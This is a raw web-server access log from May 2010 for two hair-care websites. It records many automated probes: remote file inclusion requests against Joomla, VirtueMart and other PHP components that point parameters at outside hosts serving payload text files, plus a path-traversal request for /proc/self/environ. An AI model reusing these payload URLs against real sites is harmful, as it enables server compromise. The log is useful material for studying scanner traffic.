66.7.203.196 - - [17/May/2010:20:17:48 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:20:17:49 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:20:17:50 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:20:18:07 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:20:18:07 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:20:18:07 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:19:21 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:19:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.80.122.44 - - [17/May/2010:20:19:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
68.202.229.228 - - [17/May/2010:20:19:57 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5" "growlonghairfast.com"
68.202.229.228 - - [17/May/2010:20:19:58 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:20:06 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:23:00 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:23:00 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:23:00 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
119.63.193.129 - - [17/May/2010:20:24:53 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:25:17 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:25:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:25:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:20:27:44 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:20:27:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:20:27:44 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:20:27:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:20:27:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
207.44.228.84 - - [17/May/2010:20:27:45 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:20:33:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14936 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.124.219.45 - - [17/May/2010:20:37:35 -0700] "GET /logs/access_100322.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:20:37:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:20:37:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:20:37:49 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
74.124.219.45 - - [17/May/2010:20:37:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
74.124.219.45 - - [17/May/2010:20:37:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
74.124.219.45 - - [17/May/2010:20:42:13 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:20:42:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:20:42:13 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
204.236.211.159 - - [17/May/2010:20:42:22 -0700] "GET /logs/access.log HTTP/1.1" 200 407196 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:20:44:28 -0700] "GET /logs/access_100315.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:45:17 -0700] "GET /logs/access_100419.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.freehairsecrets.com"
89.188.107.54 - - [17/May/2010:20:45:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.freehairsecrets.com"
89.188.107.54 - - [17/May/2010:20:45:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.freehairsecrets.com"
216.245.220.19 - - [17/May/2010:20:47:18 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:47:19 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:47:19 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:47:19 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:47:19 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:47:19 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:47:42 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:47:44 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:48:25 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:48:25 -0700] "GET /logs/access.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:48:26 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.68.117 - - [17/May/2010:20:48:35 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:48:42 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:48:42 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:48:42 -0700] "GET /logs/access.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:48:48 -0700] "GET /logs/access_100510.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.245.220.19 - - [17/May/2010:20:49:05 -0700] "GET /logs/access_100510.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:20:50:01 -0700] "GET /logs/access_100510.log///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:20:50:01 -0700] "GET /logs///appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:20:50:01 -0700] "GET //appserv/main.php/?appserv_root=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
117.103.14.4 - - [17/May/2010:20:50:42 -0700] "GET /logs/access_100419.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.freehairsecrets.com"
117.103.14.4 - - [17/May/2010:20:50:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.freehairsecrets.com"
117.103.14.4 - - [17/May/2010:20:50:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.819" "www.freehairsecrets.com"
89.188.107.54 - - [17/May/2010:20:53:00 -0700] "GET /logs/access_100301.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:53:01 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
89.188.107.54 - - [17/May/2010:20:53:01 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.826" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:17 -0700] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:17 -0700] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:17 -0700] "GET /logs/access.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:21 -0700] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:21 -0700] "GET /logs/access.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:21 -0700] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:24 -0700] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:25 -0700] "GET /logs/access.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:25 -0700] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:34 -0700] "GET /logs/access_100510.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:48 -0700] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:48 -0700] "GET /logs/access.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:00:48 -0700] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:21:01:10 -0700] "GET /logs/access_100510.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:21:05:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13152 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
117.103.14.4 - - [17/May/2010:21:15:46 -0700] "GET /logs/access_100301.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.819" "growlonghairfast.com"
117.103.14.4 - - [17/May/2010:21:15:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.819" "growlonghairfast.com"
117.103.14.4 - - [17/May/2010:21:15:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.819" "growlonghairfast.com"
80.239.243.11 - - [17/May/2010:21:20:35 -0700] "GET /logs/access_100315.log HTTP/1.1" 200 2504047 "-" "Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.13216/886; U; ru) Presto/2.4.15" "www.freehairsecrets.com"
119.235.24.251 - - [17/May/2010:21:26:00 -0700] "GET /bbs////delete_comment.php?board.skin.path=http://www.islammonitor.org/media/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.24.251 - - [17/May/2010:21:26:03 -0700] "GET /logs/access_100215.log%20%20//bbs////delete_comment.php?board.skin.path=http://www.islammonitor.org/media/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.24.251 - - [17/May/2010:21:26:03 -0700] "GET /logs//bbs////delete_comment.php?board.skin.path=http://www.islammonitor.org/media/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [17/May/2010:21:26:57 -0700] "GET /skin/uks_gallery_v3010/write.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [17/May/2010:21:26:57 -0700] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [17/May/2010:21:26:57 -0700] "GET /logs/access_100405.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [17/May/2010:21:27:29 -0700] "GET /logs/access_100405.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [17/May/2010:21:27:29 -0700] "GET /skin/uks_gallery_v3010/write.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [17/May/2010:21:27:29 -0700] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:21:28:05 -0700] "GET /logs/access_091109.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:30:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:30:24 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:30:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.195.114.22 - - [17/May/2010:21:31:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=709 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
119.235.24.251 - - [17/May/2010:21:32:01 -0700] "GET /logs/access.log%20%20//bbs////delete_comment.php?board.skin.path=http://www.islammonitor.org/media/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.235.24.251 - - [17/May/2010:21:32:01 -0700] "GET /logs//bbs////delete_comment.php?board.skin.path=http://www.islammonitor.org/media/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.235.24.251 - - [17/May/2010:21:32:01 -0700] "GET /bbs////delete_comment.php?board.skin.path=http://www.islammonitor.org/media/images/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.84.0.141 - - [17/May/2010:21:32:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:21:32:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14036 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.84.0.141 - - [17/May/2010:21:33:32 -0700] "GET /logs/access_100215.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.84.0.141 - - [17/May/2010:21:33:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.84.0.141 - - [17/May/2010:21:33:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
72.55.146.200 - - [17/May/2010:21:34:30 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.growlonghairfast.com"
72.55.146.200 - - [17/May/2010:21:34:30 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:38:04 -0700] "GET /logs/access_100215.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:38:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:38:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:21:46:46 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:21:47:21 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:21:47:41 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:48:18 -0700] "GET /logs/access_100315.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:48:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.84.0.141 - - [17/May/2010:21:48:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:21:50:01 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
